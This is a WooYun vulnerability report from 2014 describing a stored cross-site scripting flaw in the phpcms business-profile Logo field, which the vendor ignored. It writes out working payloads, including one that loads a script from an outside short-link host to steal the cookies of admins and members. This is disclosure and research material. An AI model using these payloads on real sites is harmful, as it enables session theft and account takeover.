当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-084564

漏洞标题:phpcms储存型XSS(demo+本地)

相关厂商:phpcms

漏洞作者: 路人甲

提交时间:2014-11-27 14:50

修复时间:2015-01-03 14:52

公开时间:2015-01-03 14:52

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-27: 细节已通知厂商并且等待厂商处理中
2014-12-02: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-01-03: 细节向公众公开

简要描述:

有点小障碍,rank评低点吧,不晓得有木有钱哈,话说还没拿到过一次有钱的

详细说明:

存在XSS的地方在会员中心--商务中心--商家资料--我的资料--Logo那里,demo+本地演示哦~
这个属于过滤不严格的问题,本来Logo那里是插入图片url的,但是试了一下直接插XSS也是可以的,我直接插入<body/onload=alert(1)>可以看到提示输入正确

1.png


然后我点击提交可以看到成功

2.png


接下来来到企业首页看看,可以看到并没有弹窗,那我就郁闷了,看下源码吧,原来是没有闭合

3.png


4.png


那么继续构造"/><body/onload=alert(1)>保存后重新来到企业首页看看,可以看到成功弹窗~

5.png


6.png


然后查看下源码吧,储存型的哦~

7.png


接下来看看能不能盲打后台,蛋疼的是demo没有提供官方后台演示,无奈只好本地搭建,本地搭建好以后来到后台,发现是不能成功盲打后台的

8.png


但是我又发现,这个商家资料是需要审核的,也就是说,在审核的过程中,管理员百分之九十九点九会先去我们的企业首页看吧,这样你们就都懂得了哈~在后台点击进去我们的企业首页查看的时候,可以看到成功弹窗~

9.png


10.png


再看看能不能打cookie吧,继续构造"><script src=http://t.cn/RzLE1X0></script>

11.png


可以看到cookie已经成功打到~另外由于这个企业首页不止管理员审核的时候可以看,是网站内会员人人都可以看到的哦,所以说你们懂得~

12.png

漏洞证明:

12.png

修复方案:

过滤呗

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-03 14:52

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2014-11-27 18:33 | 鬼五 ( 普通白帽子 | Rank:214 漏洞数:83 )

    汗死 ,PHPcms现在都走小厂商了?